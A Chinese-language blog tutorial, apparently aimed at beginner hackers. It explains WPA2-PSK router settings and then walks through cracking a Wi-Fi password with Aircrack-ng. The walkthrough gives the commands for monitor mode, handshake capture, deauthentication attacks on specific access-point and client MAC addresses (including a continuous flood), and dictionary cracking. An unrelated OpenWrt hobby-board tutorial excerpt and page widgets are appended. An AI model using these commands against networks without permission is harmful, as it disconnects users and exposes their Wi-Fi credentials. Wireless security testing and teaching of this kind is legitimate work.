用最朴素的方法WiFi无线渗透

零基础学黑客,搜索公众号:白帽子左一

作者 掌控安全学院-kkkk

WPA/WPA2:

WPA/WPA2是一种比WEP强壮的加密算法,挑选这种安全类型,路由器将选用Radius服务器进行身份认证并得到密钥的WPA或WPA2安全形式。

因为要架起一台专用的认证服务器,价值对比贵重且保护也很杂乱,所以不推荐不同用户运用此安全类型。

WPA-PSK/WPA2-PSK:

WPA-PSK/WPA2-PSK安全类型其实是WPA/WPA2的一种简化版本,它是依据同享密钥的WPA形式,安全性很高,设置也相对简单,适合不同家庭用户和小型企业运用。

其详细设置:

认证类型:该项用来挑选体系选用的安全形式,即主动、WPA-PSK、WPA2-PSK。

主动:若挑选该项,路由器会依据主机恳求主动挑选WPA-PSK或WPA-PSK的安全形式。

加密算法:该项用来挑选对无线数据进行加密的安全算法,选项有主动、TKIP、AES。默许选项为主动,挑选该项后,路由器将依据实践需求主动挑选TKIP或AES加密办法。留意11N形式不支持TKIP算法。

PSK暗码:该项就是WPA-PSK/WPA2-PSK的初始密钥了,在设置是,需求为8-63个ASCII字符或者8-64个十六进制的字符。

组密钥更新周期:该项设置播送和组博密钥的定时更新,以秒为单位,最小值为30,若该值为0,问表示不进行更新。

使用Aircrack-ng抓取WPA2-PSK握手包
主要步骤:

1.设置无线网卡至监听模式 airmon-ng start wlan0

2.扫描周围WPA2-PSK加密的无线信号 airodump-ng wlan0mon

3.新建一个终端,抓取握手包 airodump-ng -c [num] -w wpa2 wlan0mon 需指定信道

4.等待过程中,发起DeAuth攻击,强制将客户端踢下线重连,抓取握手包:

aireplay-ng -0 5 -a BSSID -c STATION wlan0mon设置为发起5次攻击

如果想要不停的发起攻击就是这样aireplay-ng -0 0 -a BSSID -c STATION wlan0mon

开始操作

我使用的网卡是TL-WN722N

图片

此时需要让虚拟机连接网卡

图片

连接成功后,输入ifconfig会看到

图片

然后输入airmon-ng start wlan0

成功后

图片

开始监听(扫描周围的无线信号)

图片

途中CN为信道

airodump-ng -c 信道 --bssid xxx -w 保存路径 wlan0mon

抓取目标的握手包

参数:—ivs -w FAN 保存ivs格式的包,名字为test —bssid 要破解ap的ssid

图片

强制将客户端踢下线aireplay-ng -0 0 -a 目标的MAC地址 -c 目标客户端MAC wlan0mon

aireplay-ng -0 0 -a F4:83:CD:F6:15:72 -c 66:F6:84:88:3C:F1 wlan0mon

开始进行攻击,但是有时候该命令会报错。这是因为网卡会随机使用信道,信道不同,多尝试几次同样的命令直到成功就行了

图片

如图所示就证明抓到了握手包

开始破解密码,执行

最后用好的字典爆破
如下的命令,成功后就可以看到已经破解出的密码,如果密码复杂一点,可能需要时间

aircrack-ng -w 字典 保存的包

图片在这里插入图片描述

aircrack-ng -w 后面都是绝对路径

在这里插入图片描述
在这里插入图片描述

  • 8
    点赞
  • 51
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
全新的WIFI作品系列程,故名思意我们这个系列以WIFI为中心,并以家为起点(涉及Bluetooth、zigbee、nrf24l01),对语音识别、视频监视、wifi家居、智能调控、人机交互、家中机器人等,一步一步带创友们改变家、从而一起改变世界! 那我们使用的WIFI开发板是使用AR9331芯片,并改造成Flash16M,内存64M(等同市面上的TP703n,使用方法也一模一样)! 系统我们使用了大名鼎鼎开源的Openwrt系统,任何人都可以对其修改,大量的开发编译程,初学也很方便,只需简单的命令就能安装驱动、程序等! WIFI作品DIY程包括:wifi音箱、mp3播放器、智能路由器、web服务器、监控摄像头、烟雾火警、入室防、手机开门、窗帘开窗、电灯开关、无线插座、红外摇控、空气检测、温度调控、语音识别、人机交互、家中机器人等等,让我们一起拯救世界吧! 第一部分:AR9331开发板(可以插各种模块) 核心版正面 核心版背面 插上扩展板 插上:USB扩展板! 插上:USB扩展板和arduino扩展板! 板的大小只有5cmx5cm(四个1元硬币),也可以用TP703n代替。 wifi板、usb扩展板、arduino扩屏板(可叠层加上去DIY各种功能),已经从工厂打板回! 官方淘宝链接:https://item.taobao.com/item.htm?id=41584503200 WIFI才是未来主流,Openwrt搞定你也可以做小米智能路由器,一起来吧! 第二部分:Openwrt开源系统(网上大把资料学习)一、网线将电脑和openwrt直接连接。 将自己电脑IP改成:192.168.1.164(150-255之间),电脑网关改192.168.1.1 二、使用浏览器打开192.168.1.1。 三、设置中文显示。 四、设置时区。 第三部分:配置WIFI(也可以当wifi路由器使用)一、打开无线,搜索家里的Wifi。 二、加入到wifi。 填写正确Wifi的密码。 提交后一定记得保存&应用,才会生效哦! 二、设置openwrt的wifi(ap+sta模式,提供给手机直接连接的)。 点击添加。 设置wifi的名称,这里就叫znck007吧 记得选择lan打勾,很重要! 设置wifi的密码,手机连接就要输入密码的。 保存&应用成功,就出现这两个列表了! 三、设置openwrt的DHCP(自动分配IP的东东,这样就不用设置静态IP了) 第四部分:进入openwrt系统(DIY产品时必需) 一、下载putty软件(电脑连接openwrt系统) https://pan.baidu.com/s/1pJluOwN 二、设置openwrt密码(有密码才能用ssh远程连接) 设置密码吧就设置znck007吧,哈哈! 三、使用putty登陆openwrt 连接192.168.1.1 输入root,和密码 登陆成功! 第五部分:升级openwrt固件(像ios6升级ios7一样) 一、下截正确的固件文件来刷系统。 1、固件下载:https://pan.baidu.com/s/1gdf67hL 2、进入刷固件页面。 3、确定刷固件。 (等1分钟左右,浏览器会自动跳转到192.168.1.1),说明固件刷成功了,记得再把语言默认设为中文哦! 第六部分:修改编译源(用于安装各种驱动和软件) 在软件包里,将src/gz开头的删除,然后添加下面,再保存/应用。 src/gz attitude_adjustment_12.09_rc2https://downloads.openwrt.org/att... xx/generic/packages 第七部分:制作自己的openwrt固件(linux、编译、C语言) 由于篇幅非常长,我们需要独立使用一篇程,才能讲明白: 传送门链接:https://www.znck007.com/forum.php?mod=viewthread&ti...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值